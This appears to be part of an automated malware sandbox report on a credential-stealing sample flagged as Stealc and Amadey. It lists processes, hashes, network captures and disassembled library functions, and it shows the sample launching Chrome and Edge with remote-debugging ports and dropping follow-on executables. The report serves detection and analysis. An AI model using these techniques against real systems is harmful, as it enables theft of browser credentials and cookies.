2024-12-08 12:32:10 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.6	49891	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:32:09 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:32:10 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:10 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: a681d1f9-301e-0020-1b07-486299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123210Z-r1cf579d778mvsklhC1EWRkavg00000005q00000000012v0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:32:10 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Target ID:	1
Start time:	07:31:10
Start date:	08/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xfc0000
File size:	1'787'904 bytes
MD5 hash:	8F8DF73091164236B35AC3CAD7969F87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2758733046.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2758733046.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2760035051.000000000184E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.2185073918.0000000005440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:31:23
Start date:	08/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:31:23
Start date:	08/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=2200,i,1340459741847875032,4804373366831485818,262144 /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:31:33
Start date:	08/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:31:34
Start date:	08/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2136,i,6607113195327049386,14986448368606126655,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:31:34
Start date:	08/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:31:34
Start date:	08/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2092,i,10298190665720480491,4854320900994786694,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:32:08
Start date:	08/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JJECFIECBG.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:32:08
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:32:09
Start date:	08/12/2024
Path:	C:\Users\user\Documents\JJECFIECBG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\JJECFIECBG.exe"
Imagebase:	0x620000
File size:	3'191'808 bytes
MD5 hash:	5CC1E2DF8F03CC33A15DDE12361499CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.2793029147.0000000000621000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:32:11
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x700000
File size:	3'191'808 bytes
MD5 hash:	5CC1E2DF8F03CC33A15DDE12361499CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.2819896687.0000000000701000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:33:00
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x700000
File size:	3'191'808 bytes
MD5 hash:	5CC1E2DF8F03CC33A15DDE12361499CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.3404324717.0000000000701000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	07:33:13
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe"
Imagebase:	0x4f0000
File size:	1'883'648 bytes
MD5 hash:	7366C5E55B0B2823487B875D11C5BE89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.6%
Total number of Nodes:	108
Total number of Limit Nodes:	12

Executed Functions

Function 6C9635A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EF688,00001000), ref: 6C9635D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9635E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C9635FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C96363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C96369F
__aulldiv.LIBCMT ref: 6C9636E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C963773
EnterCriticalSection.KERNEL32(6C9EF688), ref: 6C96377E
LeaveCriticalSection.KERNEL32(6C9EF688), ref: 6C9637BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C9637C4
EnterCriticalSection.KERNEL32(6C9EF688), ref: 6C9637CB
LeaveCriticalSection.KERNEL32(6C9EF688), ref: 6C963801
__aulldiv.LIBCMT ref: 6C963883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C963902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C963918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C96394C

Strings

MOZ_TIMESTAMP_MODE, xrefs: 6C9635DB
AuthcAMDenti, xrefs: 6C963946
GTC, xrefs: 6C963912
QPC, xrefs: 6C9638FC
GenuntelineI, xrefs: 6C963639

Memory Dump Source

Source File: 00000001.00000002.2772167866.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true

Associated: 00000001.00000002.2772129074.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772567860.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772636616.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772680750.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c960000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: c02da193ec368c5014906d882be0f33fe7e9e9d90c326e0849f2c6f2885893f2
Instruction ID: 2c3a290a033bbbf252d2fa40c6f8ab3811b988b418c87b220ea80aa77cf8596f
Opcode Fuzzy Hash: c02da193ec368c5014906d882be0f33fe7e9e9d90c326e0849f2c6f2885893f2
Instruction Fuzzy Hash: 7BB1C471B083409BDB48DF39D84561ABBF5BFAEB04F15892EE499D7B90D770D9008B81

Function 6C97C930 Relevance: 7.6, APIs: 5, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 6C97C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C97C969
GetSystemInfo.KERNEL32(?), ref: 6C97C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C97C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C97C9E2

Memory Dump Source

Source File: 00000001.00000002.2772167866.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true

Associated: 00000001.00000002.2772129074.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772567860.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772636616.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772680750.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c960000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 809a88a11ed0d40e29a39bde6d1eff1d348848a141352a261ece0bc38ec0e83f
Instruction ID: a8d9a50efb501171aa60683ff9d3309aa07339397acbd5a4ba8b7cc4ade53ced
Opcode Fuzzy Hash: 809a88a11ed0d40e29a39bde6d1eff1d348848a141352a261ece0bc38ec0e83f
Instruction Fuzzy Hash: F121FC32746314ABDB94AA24DC84BAE7779FF9A704F60051AF903A7B40DB70DD40C7A4

Function 6C963060 Relevance: 4.5, APIs: 3, Instructions: 36
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C963095

Part of subcall function 6C9635A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EF688,00001000), ref: 6C9635D5
Part of subcall function 6C9635A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9635E0
Part of subcall function 6C9635A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C9635FD
Part of subcall function 6C9635A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C96363F
Part of subcall function 6C9635A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C96369F
Part of subcall function 6C9635A0: __aulldiv.LIBCMT ref: 6C9636E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C96309F

Part of subcall function 6C985B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9856EE,?,00000001), ref: 6C985B85
Part of subcall function 6C985B50: EnterCriticalSection.KERNEL32(6C9EF688,?,?,?,6C9856EE,?,00000001), ref: 6C985B90
Part of subcall function 6C985B50: LeaveCriticalSection.KERNEL32(6C9EF688,?,?,?,6C9856EE,?,00000001), ref: 6C985BD8
Part of subcall function 6C985B50: GetTickCount64.KERNEL32 ref: 6C985BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C9630BE

Part of subcall function 6C9630F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C963127
Part of subcall function 6C9630F0: __aulldiv.LIBCMT ref: 6C963140

Part of subcall function 6C99AB2A: __onexit.LIBCMT ref: 6C99AB30

Memory Dump Source

Source File: 00000001.00000002.2772167866.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true

Associated: 00000001.00000002.2772129074.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772567860.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772636616.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2772680750.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c960000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: f720f1c3aa7183bd8ed24110f7c816a6ce4d709f5a57fb767e5ca9250014601a
Instruction ID: b2bdbc77596f9693897eda8bc21137a85c06c6467ddc4d83fcbced6ec53e0a56
Opcode Fuzzy Hash: f720f1c3aa7183bd8ed24110f7c816a6ce4d709f5a57fb767e5ca9250014601a
Instruction Fuzzy Hash: F3F0D612E2974CD7DB50DF34A8411AA7370AFBF618B20171BE84453551FB20A2D88382

Non-executed Functions

Function 6CA96E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CBE2120,6CA97E60), ref: 6CA96EBC
TlsGetValue.KERNEL32 ref: 6CA96EDF
EnterCriticalSection.KERNEL32(?), ref: 6CA96EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6CA96F25

Part of subcall function 6CA6A900: TlsGetValue.KERNEL32(00000000,?,6CBE14E4,?,6CA04DD9), ref: 6CA6A90F
Part of subcall function 6CA6A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CA6A94F

PR_Unlock.NSS3 ref: 6CA96F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6CA96FA9
TlsGetValue.KERNEL32 ref: 6CA970B4
EnterCriticalSection.KERNEL32(?), ref: 6CA970C8
PR_CallOnce.NSS3(6CBE24C0,6CAD7590), ref: 6CA97104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA97117
SECOID_Init.NSS3 ref: 6CA97128
PORT_Alloc_Util.NSS3(00000057), ref: 6CA9714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA9717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA971A9
PR_NotifyAllCondVar.NSS3 ref: 6CA971CF
PR_Unlock.NSS3 ref: 6CA971DD
free.MOZGLUE(?), ref: 6CA971EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA97208
free.MOZGLUE(00000000), ref: 6CA97221
free.MOZGLUE(00000001), ref: 6CA97235
TlsGetValue.KERNEL32 ref: 6CA9724A
EnterCriticalSection.KERNEL32(?), ref: 6CA9725E
PR_NotifyCondVar.NSS3 ref: 6CA97273
PR_Unlock.NSS3 ref: 6CA97281
SECMOD_DestroyModule.NSS3(00000000), ref: 6CA97291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA972B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA972D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA972E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA97301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA97310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA97335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA97344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA97363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA97372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CBD0148,,defaultModDB,internalKeySlot), ref: 6CA974CC
free.MOZGLUE(00000000), ref: 6CA97513
free.MOZGLUE(00000000), ref: 6CA9751B
free.MOZGLUE(00000000), ref: 6CA97528
free.MOZGLUE(00000000), ref: 6CA9753C
free.MOZGLUE(00000000), ref: 6CA97550
free.MOZGLUE(00000000), ref: 6CA97561
free.MOZGLUE(00000000), ref: 6CA97572
free.MOZGLUE(00000000), ref: 6CA97583
free.MOZGLUE(00000000), ref: 6CA97594
free.MOZGLUE(00000000), ref: 6CA975A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CA975BD
free.MOZGLUE(00000000), ref: 6CA975C8
free.MOZGLUE(00000000), ref: 6CA975F1
PR_NewLock.NSS3 ref: 6CA97636
SECMOD_DestroyModule.NSS3(00000000), ref: 6CA97686
PR_NewLock.NSS3 ref: 6CA976A2

Part of subcall function 6CB498D0: calloc.MOZGLUE(00000001,00000084,6CA70936,00000001,?,6CA7102C), ref: 6CB498E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6CA976B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CA97707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CA9771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CA97731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CA9774A
DeleteCriticalSection.KERNEL32(?), ref: 6CA97770
free.MOZGLUE(?), ref: 6CA97779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA9779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA977AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6CA977C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CA977DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6CA97821
PORT_Alloc_Util.NSS3(?), ref: 6CA97837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CA9785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CA9786F
SECMOD_AddNewModuleEx.NSS3 ref: 6CA978AC
free.MOZGLUE(00000000), ref: 6CA978BE
SECMOD_AddNewModuleEx.NSS3 ref: 6CA978F3
free.MOZGLUE(00000000), ref: 6CA978FC
free.MOZGLUE(00000000), ref: 6CA9791C

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Strings

kbi., xrefs: 6CA97886
sql:, xrefs: 6CA976FE
Spac, xrefs: 6CA97389
,defaultModDB,internalKeySlot, xrefs: 6CA9748D, 6CA974AA
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CA974C7
dbm:, xrefs: 6CA97716
dll, xrefs: 6CA9788E
NSS Internal Module, xrefs: 6CA974A2, 6CA974C6
rdb:, xrefs: 6CA97744
extern:, xrefs: 6CA9772B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 89bc42df68c24e56fa59cc54a8dc259ee8a47e7e270280900282d1af5ba8165e
Instruction ID: 8d1afc68f390f1c35917090efd8020173da8924823ed15983435755cd76d3ce8
Opcode Fuzzy Hash: 89bc42df68c24e56fa59cc54a8dc259ee8a47e7e270280900282d1af5ba8165e
